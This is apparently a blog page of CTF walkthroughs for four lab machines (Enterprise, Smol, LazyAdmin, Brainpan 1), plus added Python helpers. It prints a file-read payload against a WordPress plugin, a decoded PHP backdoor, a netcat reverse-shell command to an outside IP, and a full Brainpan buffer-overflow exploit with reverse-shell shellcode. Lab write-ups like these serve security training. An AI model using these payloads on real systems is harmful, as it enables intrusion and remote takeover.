AhmedZaid
CTF Writeups
Copyright © 2024 | Yankos

THM

Enterprise
Enterprise Challenges
Difficulty: Hard
Category: Active Directory

Initial Access

First things first, and the first thing here is to scan the IP. From the scan result we are dealing with a domain controller, and the domain name is Enterprise.THM. We run a script scan hoping to find a known vulnerability, but there isn't one 😑

So now we want to find credentials to gain initial access to this DC. Since the DC is running a web server on port 80, it is a good idea to explore it. Nothing important on this page, but it might have other pages. Another dead end, no problem, let's continue.

Another interesting service running on this DC is SMB. Can we access any share? 🤔 Yes, there is more than one share we can access as guest; one of them is the Users share, with the remark "Users share. Do not Touch". We are able to connect to it with smbclient, but to go faster we use smbmap to narrow our search:

smbmap -H 10.10.226.245 -u 'a' -p '' -r 'Users'

Even though smbmap showed that we have read permission, I got many NT_STATUS_ACCESS_DENIED listings, so I moved on to another path.

If you search GitHub for the domain name you will find an organization. In its People section there is a user called Nik-enterprise-dev who has only one repo, containing a script called mgmtScript.ps1. In the commit history of this PowerShell script there is a username and password. We connect with them to make sure they still work, and they do. In this user's home directory there are two files, but they are password protected.

We can use this user to request user SPNs (Kerberoasting) with impacket's GetUserSPNs.py, which gives us a hash. Cracking it with hashcat gives us the bitbucket user's credentials. Using RDP we get onto his desktop and find the first flag.

Privilege Escalation

We do not have much to do with this user. One of the ways to escalate Windows privileges is an unquoted service path, which is one of the easiest in my mind:

wmic service get name,pathname

Bingo, we found an interesting one. So let's create our reverse shell with msfvenom. After moving our shell into the Program Files path we need to start the service. Great news, we escalated our privilege 🎉 and here is your flag 😉
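To make the unquoted-service-path step reproducible offline, here is an added example (not code from the original writeup) that parses `wmic service get name,pathname` output and, for each unquoted path containing spaces, lists the executables the Service Control Manager tries before the real binary. The service names and paths in the sample are constructed and hypothetical; they are not the service from the box.

```python
"""Triage of `wmic service get name,pathname` output for unquoted service paths.

Added example for this writeup, not code from the original page. It parses the
columnar wmic output offline from a constructed sample and, for every unquoted
path containing spaces, lists the executables the Service Control Manager
probes before reaching the real binary (CreateProcess semantics: each prefix
cut at a space, with ".exe" appended). Dropping a service binary at one of
those paths hijacks the service if the directory is writable and the service
can be (re)started.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample (service names and paths are hypothetical, not from the box).
SAMPLE_WMIC = """\
Name                  PathName
Spooler               C:\\Windows\\System32\\spoolsv.exe
QuotedSvc             "C:\\Program Files\\Quoted Vendor\\svc.exe" -run
ExampleSvc            C:\\Program Files\\Example Vendor\\Example Service\\svc.exe -start
NoSpaceSvc            C:\\Tools\\nospaces\\svc.exe
"""


@dataclass
class Finding:
    service: str
    exe_path: str                                        # executable path as the SCM parses it
    candidates: List[str] = field(default_factory=list)  # probed before exe_path


def parse_wmic(output: str) -> Dict[str, str]:
    """Map service name -> PathName using the header's column offset."""
    lines = [ln.rstrip() for ln in output.splitlines() if ln.strip()]
    col = lines[0].index("PathName")
    return {ln[:col].strip(): ln[col:].strip() for ln in lines[1:]}


def executable_part(cmdline: str) -> Optional[str]:
    """Return the unquoted executable path, or None when the path is quoted."""
    if cmdline.startswith('"'):
        return None
    m = re.match(r"(.+?\.exe)(?=\s|$)", cmdline, re.IGNORECASE)
    return m.group(1) if m else cmdline


def hijack_candidates(exe_path: str) -> List[str]:
    """Paths Windows tries first: every prefix cut at a space, plus '.exe'."""
    return [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]


def find_unquoted(output: str) -> List[Finding]:
    """All services whose unquoted path gives the SCM something to mis-resolve."""
    findings = []
    for name, cmdline in parse_wmic(output).items():
        exe = executable_part(cmdline)
        if exe is None:
            continue
        cands = hijack_candidates(exe)
        if cands:
            findings.append(Finding(name, exe, cands))
    return findings


if __name__ == "__main__":
    for f in find_unquoted(SAMPLE_WMIC):
        print(f"[!] {f.service}: {f.exe_path}")
        for c in f.candidates:
            print(f"    drop payload at: {c}")
```

Two practical checks before dropping the msfvenom binary: confirm with icacls that the directory of the chosen candidate is writable by your user, and that you can stop/start the service (sc start, or reboot if the start type is automatic). A plain msfvenom exe is killed by the SCM after roughly 30 seconds because it never reports as a running service; that is usually enough for the reverse shell to connect, but the exe-service format avoids the problem.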
CTF Writeups · 2025-04-18
Smol
Smol Challenges
Difficulty: Medium
Category: Privilege Escalation

Initial Access

Get a cup of coffee ☕ first, this will be a slightly long walkthrough 😊

From the footer of the page at http://www.smol.thm, or from Wappalyzer, we can tell this website is using WordPress, so start by scanning it with wpscan:

wpscan --url http://www.smol.thm

From the scan result there is a plugin called jsmol2wp. Where did I hear this name before? 🤔 Yes, this plugin is vulnerable to SSRF (wpscan's vulnerability database lists it), and the same query parameter lets us read local files through php://filter. Let's try this payload on our smol.thm:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

In the wp-config.php file we found credentials for a user called wpuser:

/** Database username */
define( 'DB_USER', 'wpuser' );
/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );

From the comments section we can get to a login page, and the creds work there. Note the first important line there, which refers to the Hello Dolly plugin (just for fun 😂). Back to our work: we should review the hello.php file:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php

In this code we can see a part that uses eval, which is a dangerous function, but the rest of the line is base64 encoded. Decoding it, the statement is:

if (isset($_GET["cmd"])) { system($_GET["cmd"]); }

Adding the cmd parameter we can execute system commands. Now we want to get a shell from this:

busybox nc 10.11.130.37 4444 -e sh

And we got our initial access 🎉

Privilege Escalation

python3 -c 'import pty; pty.spawn("/bin/bash")'

As we know there is a database running, let's try to get other users' credentials from it. Cracking these hashes with john we got a password that is obviously for the user diego.

What I checked: ❌ sudo -l ❌ cat /etc/crontab ❌ SUID ❌ capabilities

In the home directory of the user think you can find an SSH key that you can use to connect. In gege's home there is a .zip file that you can read as "other", but it is password protected; you can use john to crack it. Inside this archive there is a wp-config.php file that holds the credentials of xavi. Maybe it's our lucky user... finally we escalated our privilege 😮💨 Great to see you at the end of this rich challenge 😊 keep it up 💪
CTF Writeups · 2025-04-16
LazyAdmin
LazyAdmin Challenges
Difficulty: Easy
Category: Privilege Escalation

Initial Access

As usual we start with nmap to scan the machine. There are 2 open ports, 22 and 80, so let's open the web page. OK, it's an Apache server, but we want to fuzz this IP to find more interesting pages. Great, there is a directory called content. Going deeper into this directory we find several interesting pages. The /as one is a login page, but we don't have credentials yet ;) Now this is an interesting one, as we can find working creds in this backup: a user called manager with the admin role and a hash of his password, and we got the password. Browsing this site we find a Media Center tab with a file upload. Just upload a reverse shell and you will get a shell, but remember to change the .php extension to .php5 or another extension.

Privilege Escalation

Great, we got initial access as www-data, now we need to escalate to root. Checking our permissions we saw that there is a file we can run with sudo, and we also have write permission on this file, so overwrite it with another shell, run it with sudo and you will get a root shell.
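The .php to .php5 rename works because the upload check only rejects one extension while the web server still hands .php5 to the PHP handler. Here is an added example (not code from the original writeup or from the CMS on the box) that puts that kind of denylist beside the check a media upload should do instead: an allowlist of extensions, no extra dots in the name, leading bytes that match the claimed type, and a server-chosen storage name. The filenames and file headers it runs on are constructed.

```python
"""Why renaming shell.php to shell.php5 bypassed the upload check, and a
stricter check beside it.

Added example for this writeup, not code from the original page or from the
CMS on the box. weak_is_allowed() models the denylist the bypass implies;
hardened_is_allowed() is the allowlist-plus-magic-bytes check to use instead.
"""
import os
import re
import uuid
from typing import Optional

DENIED = {".php"}                  # denylist: every other PHP extension slips through


def weak_is_allowed(filename: str) -> bool:
    """Denylist on the final extension only. If Apache maps php5/phtml/phar to the
    PHP handler, shell.php5 is still executed, so this check is bypassable."""
    return os.path.splitext(filename)[1].lower() not in DENIED


ALLOWED_MAGIC = {                  # extension -> accepted leading bytes
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def hardened_is_allowed(filename: str, head: bytes) -> bool:
    """Allowlist the extension, forbid extra dots in the stem (shell.php.jpg and
    null-byte tricks), and require the file's first bytes to match the type."""
    stem, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if ext not in ALLOWED_MAGIC or not STEM_RE.fullmatch(stem):
        return False
    return any(head.startswith(sig) for sig in ALLOWED_MAGIC[ext])


def storage_name(filename: str, head: bytes) -> Optional[str]:
    """Name to store the upload under: server-chosen, keeping only the vetted
    extension and never the client's name. None when the upload is rejected."""
    if not hardened_is_allowed(filename, head):
        return None
    return uuid.uuid4().hex + os.path.splitext(filename)[1].lower()


if __name__ == "__main__":
    PHP = b"<?php system($_GET['cmd']); ?>"          # constructed web shell header
    PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8         # constructed PNG header
    for name, head in [("shell.php", PHP), ("shell.php5", PHP), ("shell.php.jpg", PHP),
                       ("pic.png", PNG), ("pic.jpg", PHP)]:
        print(f"{name:15} weak={weak_is_allowed(name)!s:6} "
              f"hardened={hardened_is_allowed(name, head)}")
```

Even with the hardened check, the upload directory should be served with PHP execution disabled (no handler for it, or php_admin_flag engine off), so that a polyglot that passes the magic-byte test still cannot run.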
CTF Writeups · 2025-04-16
Brainpan 1
Brainpan 1 Challenges
Difficulty: Hard
Category: Reversing

Walkthrough

Starting with nmap to scan the machine, we found a service called abyss on port 9999 and a web server running on port 10000. Opening it returns a page with nothing interesting, so let's use dirb to discover directories. Opening /bin we found an .exe file called Brainpan.exe; let's download it.

Let's reverse this file with Ghidra. This is the program running on port 9999: it takes one input from the user and returns ACCESS DENIED or ACCESS GRANTED. Friendly advice: don't waste your time getting the correct password, as it is just a plain string in the binary, but as I have wasted mine :) if you send the string shitstorm it returns ACCESS GRANTED. The actually vulnerable part of the code is the strcpy, which does not check bounds, so if the input is longer than 520 bytes it overflows local_20c.

Now we want to run this exe inside a debugger to cause the overflow and see what lands in EIP, to start building our exploit. I will use Immunity Debugger for this, with a pattern created by msf-pattern_create to find the exact offset. After a looooooooooong time I realized that ncat has a maximum buffer size of 511 🙂 so let's use Python:

import socket

# Target details
TARGET_IP = "127.0.0.1"
TARGET_PORT = 9999

# Payload (1000 'A' characters)
payload = "A" * 1000

# Create a TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    # Connect to the target
    s.connect((TARGET_IP, TARGET_PORT))
    print("[+] Connected to the target")

    # Receive banner (if any)
    response = s.recv(1024)
    print("[+] Received:", response.decode(errors="ignore"))

    # Send the payload
    s.sendall(payload.encode())
    print("[+] Sent 1000 bytes")

    # Receive response (if any)
    response = s.recv(1024)
    print("[+] Server response:", response.decode(errors="ignore"))
except Exception as e:
    print("[!] Connection failed:", str(e))
finally:
    s.close()
    print("[+] Connection closed")

And finally it's a crash. As we successfully caused the overflow, we use the mona script inside Immunity Debugger to find the address of a jmp esp instruction, create a reverse shell with msfvenom that connects back to my local IP on port 4444, and modify the script:

import socket
import struct

# Target details
TARGET_IP = "127.0.0.1"
TARGET_PORT = 9999

# 524 bytes of filler to reach the saved return address, then the jmp esp
# address found with mona (0x311712F3) written little-endian
offset = b"A" * 524
eip = b'\xf3\x12\x17\x31'  # 311712F3

# msfvenom reverse shell (connects back on port 4444)
buf = b""
buf += b"\xd9\xc1\xba\x43\xbc\xeb\x48\xd9\x74\x24\xf4\x5d"
buf += b"\x31\xc9\xb1\x52\x31\x55\x17\x03\x55\x17\x83\x86"
buf += b"\xb8\x09\xbd\xf4\x29\x4f\x3e\x04\xaa\x30\xb6\xe1"
buf += b"\x9b\x70\xac\x62\x8b\x40\xa6\x26\x20\x2a\xea\xd2"
buf += b"\xb3\x5e\x23\xd5\x74\xd4\x15\xd8\x85\x45\x65\x7b"
buf += b"\x06\x94\xba\x5b\x37\x57\xcf\x9a\x70\x8a\x22\xce"
buf += b"\x29\xc0\x91\xfe\x5e\x9c\x29\x75\x2c\x30\x2a\x6a"
buf += b"\xe5\x33\x1b\x3d\x7d\x6a\xbb\xbc\x52\x06\xf2\xa6"
buf += b"\xb7\x23\x4c\x5d\x03\xdf\x4f\xb7\x5d\x20\xe3\xf6"
buf += b"\x51\xd3\xfd\x3f\x55\x0c\x88\x49\xa5\xb1\x8b\x8e"
buf += b"\xd7\x6d\x19\x14\x7f\xe5\xb9\xf0\x81\x2a\x5f\x73"
buf += b"\x8d\x87\x2b\xdb\x92\x16\xff\x50\xae\x93\xfe\xb6"
buf += b"\x26\xe7\x24\x12\x62\xb3\x45\x03\xce\x12\x79\x53"
buf += b"\xb1\xcb\xdf\x18\x5c\x1f\x52\x43\x09\xec\x5f\x7b"
buf += b"\xc9\x7a\xd7\x08\xfb\x25\x43\x86\xb7\xae\x4d\x51"
buf += b"\xb7\x84\x2a\xcd\x46\x27\x4b\xc4\x8c\x73\x1b\x7e"
buf += b"\x24\xfc\xf0\x7e\xc9\x29\x56\x2e\x65\x82\x17\x9e"
buf += b"\xc5\x72\xf0\xf4\xc9\xad\xe0\xf7\x03\xc6\x8b\x02"
buf += b"\xc4\x96\x4b\x0c\x15\x01\x4e\x0c\x04\x8d\xc7\xea"
buf += b"\x4c\x3d\x8e\xa5\xf8\xa4\x8b\x3d\x98\x29\x06\x38"
buf += b"\x9a\xa2\xa5\xbd\x55\x43\xc3\xad\x02\xa3\x9e\x8f"
buf += b"\x85\xbc\x34\xa7\x4a\x2e\xd3\x37\x04\x53\x4c\x60"
buf += b"\x41\xa5\x85\xe4\x7f\x9c\x3f\x1a\x82\x78\x07\x9e"
buf += b"\x59\xb9\x86\x1f\x2f\x85\xac\x0f\xe9\x06\xe9\x7b"
buf += b"\xa5\x50\xa7\xd5\x03\x0b\x09\x8f\xdd\xe0\xc3\x47"
buf += b"\x9b\xca\xd3\x11\xa4\x06\xa2\xfd\x15\xff\xf3\x02"
buf += b"\x99\x97\xf3\x7b\xc7\x07\xfb\x56\x43\x27\x1e\x72"
buf += b"\xbe\xc0\x87\x17\x03\x8d\x37\xc2\x40\xa8\xbb\xe6"
buf += b"\x38\x4f\xa3\x83\x3d\x0b\x63\x78\x4c\x04\x06\x7e"
buf += b"\xe3\x25\x03"

# NOP sled in front of the shellcode, int3 marker at the end
nop = b'\x90' * 50
eof = b"\xCC"
payload = offset + eip + nop + buf + nop + eof

# Create a TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the target
s.connect((TARGET_IP, TARGET_PORT))
print("[+] Connected to the target")
# Receive banner (if any)
response = s.recv(1024)
# Send the payload
s.sendall(payload)
print("[+] Sent %d bytes" % len(payload))
s.close()

This worked correctly and we got a reverse shell. Now we want to send it to the actual server; remember to recreate the reverse shell with your own IP. We got a shell, but it seems we are inside a sandbox/evasion environment. Now we know that we can run /home/anansi/bin/anansi_util with sudo. This binary gives us 3 commands we can run: network, proclist and manual. From GTFOBins we know that we can get a shell from man using !/bin/sh
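The offset of 524 comes from reading EIP at the pattern crash and feeding it to msf-pattern_offset. Here is an added example (not code from the original writeup) that reproduces that step in Python: it regenerates the Metasploit-style cyclic pattern, maps the EIP value back to an offset, and assembles the final buffer in the same layout as the exploit above (filler, return address, NOP sled, shellcode) with a check for bytes strcpy would truncate on. The EIP value in the demo is computed from the pattern itself; the shellcode is an int3 placeholder, not real shellcode.

```python
"""Offset finding and payload layout for a strcpy overflow, done in Python
instead of msf-pattern_create / msf-pattern_offset.

Added example for this writeup, not code from the original page. The crash
EIP used below (0x35724134) is simply the pattern bytes at offset 524 read as
a little-endian dword; the shellcode is a placeholder.
"""
import string
import struct
from typing import Iterable

MAX_PATTERN = 26 * 26 * 10 * 3      # 20280 bytes before the pattern repeats


def pattern_create(length: int) -> bytes:
    """Same sequence as msf-pattern_create: Aa0Aa1...Aa9Ab0... (upper, lower, digit)."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat; offsets past 20280 are ambiguous")
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(eip_value: int, length: int = MAX_PATTERN) -> int:
    """Offset of the 4 pattern bytes that ended up in EIP. Pass the value exactly
    as the debugger shows it (e.g. 0x35724134); it is matched little-endian."""
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern (wrong length, or EIP is not pattern bytes)")
    return idx


def bad_bytes(blob: bytes, bad: Iterable[int] = (0x00,)) -> set:
    """Which forbidden byte values appear in blob (strcpy stops copying at 0x00)."""
    return {b for b in bad if b in blob}


def build_payload(offset: int, jmp_esp: int, shellcode: bytes,
                  nops: int = 50, bad: Iterable[int] = (0x00,)) -> bytes:
    """offset bytes of filler, the jmp esp address little-endian, a NOP sled and
    the shellcode; refuses to build a buffer that strcpy would truncate."""
    payload = b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nops + shellcode
    found = bad_bytes(payload, bad)
    if found:
        raise ValueError("bad bytes in payload: " + ", ".join(f"0x{b:02x}" for b in sorted(found)))
    return payload


if __name__ == "__main__":
    crash_eip = 0x35724134               # EIP after sending pattern_create(1000)
    off = pattern_offset(crash_eip)
    print(f"[+] EIP offset: {off}")
    placeholder = b"\xcc" * 4            # int3 stand-in for the msfvenom shellcode
    p = build_payload(off, 0x311712F3, placeholder)
    print(f"[+] payload {len(p)} bytes, bytes landing in EIP: {p[off:off + 4].hex()}")
```

Send pattern_create(1000) with the first socket script above, read EIP from Immunity, and pattern_offset() gives the filler length; the bad-byte list should then be extended with whatever mona's bytearray comparison reports for this binary before generating the msfvenom payload with -b.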
CTF Writeups · 2025-04-15